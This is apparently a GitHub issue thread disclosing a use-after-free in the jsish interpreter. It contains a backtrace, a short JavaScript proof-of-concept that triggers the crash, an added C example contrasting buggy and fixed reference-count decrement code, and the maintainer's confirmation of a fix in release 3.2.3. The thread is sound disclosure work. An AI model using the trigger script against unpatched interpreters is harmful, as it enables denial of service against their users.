
Use After Free in JsiInterp:643 #18

Closed
SteinsGatep001 opened this issue Oct 13, 2020 · 4 comments

Comments

@SteinsGatep001

Description

When jsi_DecrRefCount calls the jsi_freeValueEntry function, it incorrectly references the heap block that has been freed by jsi_freeValueEntry (src/jsiInterp.c:643), causing the Use After Free vulnerability.

Build Environment

Ubuntu 16.04 x86_64
gcc version 6.5.0 20181026

Debug Information

backtrace

//...
Program received signal SIGABRT
// ...
#4  0x00000000004249e1 in jsi_freeValueEntry (interp=0x83d010, hPtr=0x8ce930, ptr=0x8cd110) at src/jsiInterp.c:643
#5  0x000000000044c446 in Jsi_HashClear (tablePtr=0x849350) at src/jsiHash.c:507
#6  0x000000000044c53b in Jsi_HashDelete (tablePtr=0x849350) at src/jsiHash.c:526
#7  0x0000000000429975 in jsiInterpDelete (interp=0x83d010, unused=0x83d010) at src/jsiInterp.c:1849
#8  0x000000000042a3fd in Jsi_EventuallyFree (interp=0x83d010, data=0x83d010, proc=0x4291ec <jsiInterpDelete>) at src/jsiInterp.c:1987
#9  0x000000000042a19a in Jsi_InterpDelete (interp=0x83d010) at src/jsiInterp.c:1941
#10 0x000000000059ad50 in jsi_main (argc=0x2, argv=0x7fffffffdfd8) at src/main.c:46
#11 0x000000000059ad9f in main (argc=0x2, argv=0x7fffffffdfd8) at src/main.c:52
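The bug class the description points at (a decrement-and-free path that reads the block its free routine has just released), shown as an added example that is not jsi's code: a hypothetical refcounted Value with the buggy and the corrected decrement side by side. The names Value, value_free, decr_ref_buggy and decr_ref_fixed are assumptions; the 'freed' poison field and the stale-read counter stand in for what a sanitizer's quarantine would report, so the stale read is observable instead of being undefined behaviour.

```c
#include <stdio.h>
#include <stdlib.h>
#include <string.h>

/* Hypothetical refcounted value; not jsi's Jsi_Value. The 'freed' field is a
 * poison marker that lets the demo observe a stale read instead of hitting
 * undefined behaviour. */
typedef struct Value {
    int refCount;
    int freed;
    char *name;
} Value;

/* Counts reads that touched an already-freed Value, the way a sanitizer
 * with a quarantine would report them. */
static int g_staleReads = 0;

static Value *value_new(const char *name) {
    Value *v = calloc(1, sizeof *v);
    if (!v) abort();
    v->refCount = 1;
    v->name = malloc(strlen(name) + 1);
    if (!v->name) abort();
    strcpy(v->name, name);
    return v;
}

/* Releases the value's contents and poisons the block. Real code would
 * free(v) here; the demo keeps the struct in quarantine so the stale
 * read below is observable. */
static void value_free(Value *v) {
    free(v->name);
    v->name = NULL;
    v->freed = 1;
}

/* Ends the quarantine once the scenario is over. */
static void value_release(Value *v) { free(v); }

/* Checked read of refCount: records the read if the block is poisoned. */
static int value_refcount(const Value *v) {
    if (v->freed) g_staleReads++;
    return v->refCount;
}

/* Buggy pattern: frees the block, then reads it to build the return value. */
static int decr_ref_buggy(Value *v) {
    v->refCount--;
    if (v->refCount <= 0)
        value_free(v);
    return value_refcount(v);   /* stale read when the block was just freed */
}

/* Fixed pattern: compute the result first, and never touch v after
 * value_free(). The caller must also drop its own pointer, since the
 * return value of 0 is the only signal that v is gone. */
static int decr_ref_fixed(Value *v) {
    int rc = --v->refCount;
    if (rc <= 0)
        value_free(v);
    return rc;
}

/* Runs one decrement on a fresh single-reference value and returns how
 * many stale reads the checked accessor saw (1 for buggy, 0 for fixed). */
static int count_stale_reads(int (*decr)(Value *)) {
    g_staleReads = 0;
    Value *v = value_new("global");
    (void)decr(v);
    int stale = g_staleReads;
    value_release(v);
    return stale;
}

int main(void) {
    printf("buggy: %d stale read(s)\n", count_stale_reads(decr_ref_buggy));
    printf("fixed: %d stale read(s)\n", count_stale_reads(decr_ref_fixed));
    return 0;
}
```

The poison field only exists so the example can count the stale read deterministically; on a real build the same pattern is what an AddressSanitizer build (gcc -fsanitize=address) reports as heap-use-after-free with a backtrace like the one above, which is the cheapest way to confirm a fix of this kind before release.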
@SteinsGatep001
Author

PoC

var global = this;
(function () {
    try {
        throw function () {
            this.global = 'test';
        };
    } catch (e) {
    }
}());
this.global = 'test'; // trigger use after free

pcmacdon pushed a commit that referenced this issue Oct 13, 2020
FossilOrigin-Name: 930e210f5d990ed4953cf49cb9d7528247c0d55d19b9158d60cec49f46649986
@pcmacdon
Owner

Great find of a problem in code that was supposed to be removed a long time ago. Fixed in Release "3.2.3".

@SteinsGatep001
Author

> Great find of a problem in code that was supposed to be removed a long time ago. Fixed in Release "3.2.3".

The source code I use is http://jsish.org/zip

Build Environment

Ubuntu 16.04 x86_64
wget http://jsish.org/zip -O jsi.zip && unzip jsi.zip && cd jsi && make

@pcmacdon
Owner

I probably wasn't clear. I meant yes you did find a problem.

But it should be fixed now, in the code I just committed today for "3.2.3".

$ jsish -v
3.2.3 3.0203 84f5b80e64d1abdcf634e27cb6b86dce8e8c87ed 2020-10-14 00:32:37 UTC
$ jsish /tmp/glob.jsi
$ cat /tmp/glob.jsi 
var global = this;
(function () {
    try {
        throw function () {
            this.global = 'test';
        };
    } catch (e) {
    }
}());
this.global = 'test'; // trigger use after free
